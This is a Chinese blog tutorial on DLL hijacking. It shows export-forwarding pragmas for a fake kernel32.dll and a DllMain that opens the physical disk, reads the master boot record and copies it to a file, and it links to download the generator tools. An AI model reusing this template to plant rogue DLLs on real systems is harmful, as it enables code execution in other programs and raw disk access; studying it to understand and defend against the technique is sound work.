DLL劫持技术

最新推荐文章于 2024-05-13 02:48:41 发布
最新推荐文章于 2024-05-13 02:48:41 发布
阅读量4.4k 收藏 6
点赞数 4
分类专栏: C/C++ 系统底层 文章标签: 函数 技术 kernel c语言 APIHOOK
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_19459853/article/details/50538832
版权

DLL劫持技术不想再多说了,具体的可以百度。。。。

先简单的说一句。。。运行一个PE文件,WINDOWS会首先在当前目录下寻找要用的DLL,如果找不到就上其他地方找,一直到系统目录。。。

然后想干嘛就干嘛了。。。

首先得伪造,别告诉我随便找个PE文件然后改一下名字就是伪造了。。。。

怎么伪造呢?当然是伪造导入表。

这里以劫持kernel32.dll来做一个读取硬盘的例子,做什么都可以的。。。反正我是想不到了

咳咳 是的,伪造导入表是很麻烦的工作,还得写转发的代码。如果某DLL的导入表很多(比如kernel32.dll和user32.dll),那你还没写成就先累死了。。。。。

这里以kernel32.dll为例(导入表好多好多的)

某个kernel32.dll的部分导出函数如下:

#pragma comment(linker, "/EXPORT:ActivateActCtx=_AheadLib_ActivateActCtx,@5")
#pragma comment(linker, "/EXPORT:AddAtomA=_AheadLib_AddAtomA,@6")
#pragma comment(linker, "/EXPORT:AddAtomW=_AheadLib_AddAtomW,@7")
#pragma comment(linker, "/EXPORT:AddConsoleAliasA=_AheadLib_AddConsoleAliasA,@8")
#pragma comment(linker, "/EXPORT:AddConsoleAliasW=_AheadLib_AddConsoleAliasW,@9")
#pragma comment(linker, "/EXPORT:AddDllDirectory=_AheadLib_AddDllDirectory,@10")

还有不少的呢,总共1000多行。。。。
这里推荐一款很好用的自动生成工具:



使用很简单。用默认的就可以。。。

然后你可以在生成的代码中找到

AheadLib_原DLL导出函数名()

比如

ALCDECL AheadLib_MulDiv(void)
{
	GetAddress("MulDiv");
	__asm JMP EAX;
}

在这里,你可以添加一些自己的代码。。。

这里我们的目的是在被劫持的kernel32.dll启动就弹出一些对话框,然后读取硬盘的主引导记录


BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
	if (dwReason == DLL_PROCESS_ATTACH)
	{
		DisableThreadLibraryCalls(hModule);
		FILE *DiskFile;
		FILE *MBRCode;
		unsigned char Code[DISKSIZE]={0};
		DiskFile=fopen("\\\\.\\PhysicalDrive0","rb+");
		MsgBox("判断硬盘主引导记录是否能被读取,点击[确定]按钮继续");
		if(!DiskFile)
		{
			MsgBox("打开硬盘失败");
			goto Exit;
		}
		else if(!feof(DiskFile))
		{
			fseek(DiskFile,0,SEEK_SET);//移动到主引导记录的位置
			fread(Code,1,DISKSIZE,DiskFile);
			if(Code[510]==85 && Code[511]==170)
			{
				MsgBox("系统可以识别主引导记录");
				MsgBox("点击[确定]将MBR保存到当前目录")
			}
			else
			{
				MsgBox("系统不能识别主引导记录");
				MsgBox("点击[确定]将MBR保存到当前目录");
			}
			MBRCode=fopen("MBR.ini","wb+");
			if(!MBRCode)
			{
				MsgBox("备份主引导记录失败");
				goto Exit;
			}else if(!feof(MBRCode))
			{
				fwrite(Code,DISKSIZE,1,MBRCode);
				fclose(MBRCode);
				fclose(DiskFile);
				MsgBox("主引导记录备份成功,文件名是当前目录下的 MBR.ini");
			}
		}
Exit:
		return Load();
	}
	else if (dwReason == DLL_PROCESS_DETACH)
		Free();
	return TRUE;
}


我有一个加了VMP壳的CM,这个在启动时用到了kernel32.dll中的一个或者多个函数。双击它


一直点击到:

当点击到这里时,程序的窗口才会显示
好啦,把用到的工具一起传上来吧

下载地址:http://pan.baidu.com/s/1kTX1MB1

_KaQqi
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
【C/C++】劫持技术
linchaolong的专栏
02-28 7924
劫持 劫持的原理就是把目标函数的指针的指向修改为自定义函数的地址。 函数是放在内存中的代码区,所以劫持与代码区密切相关。 实现劫持需要使用detours。 detours detours是微软亚洲研究院出口的信息安全产品,主要用于劫持。这个工具使用C语言实现,所以是跨平台的。 detours根据函数指针改变函数的行为,可以拦截任何函数,即使操作系
DLL劫持
include_heqile的博客
10-28 1717
dll劫持就是使用自己制作的恶意dll文件伪装成程序正常运行中会用到的dll文件,一般情况下dll劫持攻击利用的是程序缺失的dll文件,因为如果一个应用程序缺失了某个dll文件,并且在此前提下还可以正常运行,那么它就会执行一次搜索(这里有个前提是,程序的源代码中并未明确指定该dll文件的具体路径) 在windows xp sp2之前(不包括sp2),程序搜索dll文件的顺序是这样的: 1.&nbs...
DLL_THREAD_DETACH 认识误区
Koma的主页
12-07 2630
DLL 里面使用TLS (Local Thread Storage)的常见做法是:在DLLMain的DLL_PROCESS_ATTACH/DLL_THREAD_ATTACH被调用的时候为每个线程(Thread)分配内存,而在DLL_THREAD_DETACH/DLL_PROCESS_DETACH被调用的时候释放内存。 MSDN文章《Using Thread Local Storag
运维最全DLL 劫持原理(运维),来来来
最新发布
m0_60635609的博客
05-13 1005
那么最终Windows2003以上以及win7以上操作系统通过“DLL路径搜索目录顺序”和“KnownDLLs注册表项”的机制来确定应用程序所要调用的DLL的路径,之后,应用程序就将DLL载入了自己的内存空间,执行相应的函数功能。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
DLL劫持案例——反弹shell
渗透测试
09-02 641
目标,对一个录屏软件进行dll劫持
dll劫持技术
06-24
Dll劫持,其实攻击的方法说白了就是偷梁换柱。将一些恶意的DLL文件伪装成Windows的动态链接库,由于某些软件在调用Windows动态链接库的时候会先搜索本目录下的,因此就导致了伪装DLL文件的执行。
一种通用DLL劫持技术研究
11-29
一种通用DLL劫持技术研究一种通用DLL劫持技术研究一种通用DLL劫持技术研究
dll劫持工具.zip
10-05
DLL劫持DLL Hijacking)是一种在Windows操作系统中利用动态链接库加载机制的安全漏洞进行攻击的技术DLL文件是Windows系统和应用程序中广泛使用的组件,它们包含可重用的代码和数据,供多个程序共享。当一个程序...
DLL劫持C++源代码创建器
03-21
本工具自动创建用于进行DLL劫持的C++源代码。选择你正在运行的应用程序,选择应用程序加载的DLL,本工具为你创建一个用户劫持DLL的源代码。代码中有详细的指导,按照指导去配置你的VS,马上编译一个用来劫持DLL。马上下载下来试试吧。如何创建这个工具,请查看软件的帮助。
DLL劫持代码生成.zip
09-24
DLL劫持代码生成.zip 用于生产劫持dll的xxx.cpp代码
写自己的软件用ws2_32做网络劫持破解
10-18
用ws2_32.dllHOOK劫持IP 易语言编写。附带所需模块和视频教程
ws2_32劫持
04-05
ws2_32劫持
version.dll 劫持源代码
01-08
本篇文章将深入探讨`version.dll`劫持的概念、技术细节以及如何通过源代码实现这一行为。 ### 1. `version.dll` 劫持的原理 `version.dll` 劫持通常涉及以下步骤: - **替换系统文件**:首先,攻击者会替换系统...
DLL劫持生成软件
08-24
DLL劫持是一种安全漏洞利用技术,攻击者通过将恶意版本的DLL文件放置在系统路径或应用程序搜索路径中,使得程序在运行时错误地加载这个恶意版本,从而实现对系统的控制或数据窃取。 DLL劫持生成软件是一种工具,...
实现DLL内存补丁,DLL劫持技术
laobobo999的专栏
05-17 1495
 在windows下当一个可执行文件运行时,Windows加载器将可执行模块映射到进程的地址空间中,加载器分析可执行模块的输入表,并设法找出任何需要的DLL,并将它们映射到进程的地址空间中。由于输入表是根据DLL名来进行查找,首先是查找当前目录下有没这文件,没有话在去查找系统目录C:\\Windows\\system32有没这文件,所以我们可以完全趁这个机会去劫持DLL,把他劫持下来后就可以
dll 源码_偷偷学习DLL劫持
weixin_39683526的博客
11-29 1589
文章主要是用来记录学习觉得low啊简单啊的话也不许笑话不然嘴给你们撕烂嘤嘤嘤Q达不溜Q首先是dll劫持的原理ღゝ◡╹)ノ♡就是攻击者能够利用Windows加载DLL的规则将需要劫持程序目录下的合法DLL替换成恶意DLL1.使用DLL_Hijacker.py来生成CPP源码(要注意路径要使用dll文件所在的路径哦):DLL_Hijacker.py "D:\Program Files(x8...
易语言编写dll劫持补丁
09-17
易语言是一种简单易学的编程语言,可以用来编写Windows下的应用程序。在编写dll劫持补丁时,可以使用易语言来实现。 首先,dll劫持是指通过修改被劫持的进程加载的dll路径或名称,使其加载恶意的dll文件。编写dll劫持补丁实际上是为了修复这个漏洞,使被劫持的进程加载正确的dll文件。 在易语言中,可以使用WinAPI函数来完成这个任务。首先,需要用到的函数有以下几个:LoadLibrary函数,用于加载dll文件;GetModuleFileName函数,用于获取正在运行的进程模块的文件名;GetWindowsDirectory函数,用于获取Windows目录;GetProcAddress函数,用于获取函数地址;SetWindowText函数,用于设置窗口文本。 具体的步骤如下: 1. 使用GetModuleFileName函数获取当前运行的进程的文件名; 2. 使用GetWindowsDirectory函数获取Windows目录; 3. 使用SetWindowText函数设置窗口文本,提示正在修复dll劫持; 4. 使用LoadLibrary函数加载正确的dll文件; 5. 使用GetProcAddress函数获取正确的函数地址; 6. 修改被劫持函数指针为正确的地址; 7. 修复完成后,使用SetWindowText函数恢复窗口文本。 以上就是使用易语言编写dll劫持补丁的基本思路和步骤。需要注意的是,这只是一种简单的办法,不能解决所有的dll劫持问题,对于复杂的劫持行为可能需要使用其他更底层的编程语言和技术进行修复。同时,在使用这种修复方法时,也要遵循法律法规,确保程序的合法性和正当性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值